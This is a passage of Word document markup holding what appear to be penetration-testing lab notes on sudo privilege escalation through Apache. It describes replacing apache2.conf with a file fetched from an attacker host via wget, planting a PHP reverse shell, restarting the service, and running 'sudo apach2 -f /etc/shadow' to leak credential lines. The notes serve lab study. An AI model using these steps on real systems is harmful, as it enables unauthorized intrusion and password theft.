        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we saw that the user could run the following as sudo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1112"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(ALL) NOPASSWD: /bin/systemctl start apache2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EB5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1112"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(ALL) NOPASSWD: /bin/systemctl stop apache2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1112"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(ALL) NOPASSWD: /bin/systemctl restart apache2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EB7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EB8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For context, we found that there were only two users: natraj and mahakal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EB9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EBA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This means the services for Apache2 can be started, stopped, and restarted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EBB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EBC">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I tried looking for GTFObins for this and had no luck so I checked to see if the apache2 conf file can be written to and sure enough we had full access to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">apache2.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EBD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EBE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="939800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="187" name="image192.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image192.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId641"/>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1EBF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EC0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I checked the apache2.conf file and found the section that identifies the users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EC1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EC2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3953508" cy="3529013"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="69" name="image92.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image92.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId642"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3953508" cy="3529013"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EC3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EC4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So for privesc that attack vector is as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EC5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EC6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TLDR</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: We added the username of another user (mahakal) to the Apache Configuration file, and then restarted the apache service, which will then run the apache service as mahakal. And then we also uploaded a reverse shell to /var/www/html and then visited that reverse shell file on firefox, which will make the apache server (now running as mahakal) run that reverse shell. This is how we changed from www-data to mahakal, and then mahakal ended up having more privileges that led to root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EC7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="675"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy the contents of apache2.conf to a local file in our own Kali </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and change the usernames to root or one of the two users (I tried all of them but only mahakal worked)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="675"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4464975" cy="2683278"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="520" name="image510.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image510.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId643"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4464975" cy="2683278"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ECA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="675"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload the file to the target machine using wget and copy the file to replace the actual config file of apache2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ECB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="675"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the target machine:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ECC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="675"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /tmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ECD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="675"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget http://192.168.45.240/apache.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ECE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="675"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cp apache.conf /etc/apache2/apache2.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ECF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="675"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I will check the replacement went fine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ED0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="675"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3804196" cy="2481263"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="443" name="image447.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image447.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId644"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3804196" cy="2481263"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ED1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="675"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I will create a php reverseshell on kali and upload it to the target. Move it to /var/www/html on the target machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ED2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="675"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3251200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="251" name="image247.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image247.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId64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1ED3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="675"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, create a listener for the shell.php. Restart apache2. We will lose the connection on this listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ED4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="675"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /bin/systemctl restart apache2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ED5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="675"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lets visit the shell.php and check the 2nd listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="675"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The new shell is with mahakal permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ED7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ED8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ED9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_h6u0qnfqj17j" w:id="262"/>
      <w:bookmarkEnd w:id="262"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache2 (/usr/sbin/apache2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EDA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from Tib3rius Sudo Video</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EDB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EDC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you can run /usr/sbin/apach2 as sudo, you can actually read the first line of any file. This is because the error message prints out the first line. While this is not always very helpful, you can try looking at the first line of files like /etc/passwd or like /etc/shadow. In the video, they found root password by looking at /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EDD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EDE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="495300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="17" name="image16.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image16.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId646"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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1EDF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1244"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apach2 -f /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EE0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
